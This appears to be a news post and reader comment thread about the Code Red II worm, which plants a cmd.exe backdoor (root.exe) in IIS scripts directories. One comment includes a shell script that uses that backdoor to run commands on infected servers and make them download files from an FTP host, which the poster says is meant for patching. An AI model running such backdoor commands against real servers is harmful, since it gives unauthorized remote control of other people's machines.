Code Red II: Shells for the Taking

sigurdur writes "It seems there is a new and more malicious version of Code Red out there. This one seems to try and copy cmd.exe into a position where it is accesible to us all - the scripts directory. So far I have seen it reported on the intrusions-list at incidents.org where they also just put up a notice about this third generation Code Red worm." I still think sircam is more annoying since it affects every email user, and not primarily poorly administered websites. But imagine how much bandwidth Code Red and Sircam have wasted in the last few weeks?

Re:The Breaking Point

[Malcontent]

You can't sue MS (they are bigger then the govt prectically). But you can probably sue and company which uses IIS and stores your personal data. If that comapny was using IIS and they failed to patch their system then they have been criminally negligent in their duties. A few suits and all companies will drop IIS like a hot potato.
Everybody wins.

Re:Microsoft Internet Pollution - My Server Log!

[jeremyp]

There's been an IIS patch available for several months which blocks the hole exploited by CodeRed. You can't sue M$ for negligence but you might be able to sue any of the web server owners who haven't applied the patch.

Actually, there has been a beneficial effect with CodeRed (in the UK at least). I have seen several reports on British network news programmes that talk about "security flaws in M$ software", not "security flaws in the Internet". It's quite a step forward for the media here not to treat M$ software and Internet / PC software as being effectively synonymous. There is a faint but real message that the problem is Microsoft.

File download script

[nebby]

(Copied from the other thread, for those who are working on a way to fix this worm)

I played around for a few hours with this, trying to make a ghetto script that would fix the servers. There's no way for me to be sure my other stuff works, but the thing I did get working was a script to download files to the infected server from an ftp site.


#!/bin/sh
# Code Red ][ Download File script
# Usage: dlfile.sh infectedIP filename
#
# Please set the $ftp and $dir values to
# the ftp and directory of the patch and shutdown repository

# For ftp.youhavesetup.com
FTP="ftp%2eyouhavesetup%2ecom"
# Directory /pub/cr
DIR="%2fpub%2fcr"

echo GET /scripts/root.exe?+%2fc+echo+bin+%3etmpfile | telnet $1 80
sleep 1
echo GET /scripts/root.exe?+%2fc+echo+get+$DIR%2f$2+%3e%3et mpfile | telnet $1 80
sleep 1
echo GET /scripts/root.exe?+%2fc+echo+ftp+%2dA+%2ds%3atmpfi le+$FTP+%3edlfile%2ecmd | telnet $1 80
# Note that slashcode inserts a space in the string 'tmpfile' on both these lines, remove before running
sleep 1
echo GET /scripts/root.exe?+/k+dlfile%2ecmd | telnet $1 80


I tried setting it up and got the servers to download the patches, but I can't be sure that they are actually run. (I don't have an infected machine to test.) Also, I was unable to figure out a way to get the machines to reboot or restart IIS. It appears root.exe has limited permission in what it can do (as another poster or two stated.) There might be hacks that will do what I want to, but I'm too tired to mess with this anymore :)

...and these machines are proud of it!

[Sun+Tzu]

heheh! Not only is it a fine remote administration feature, but it's also pretty slick the way machines upgraded in this way advertise their new status to everyone with a webserver on port 80.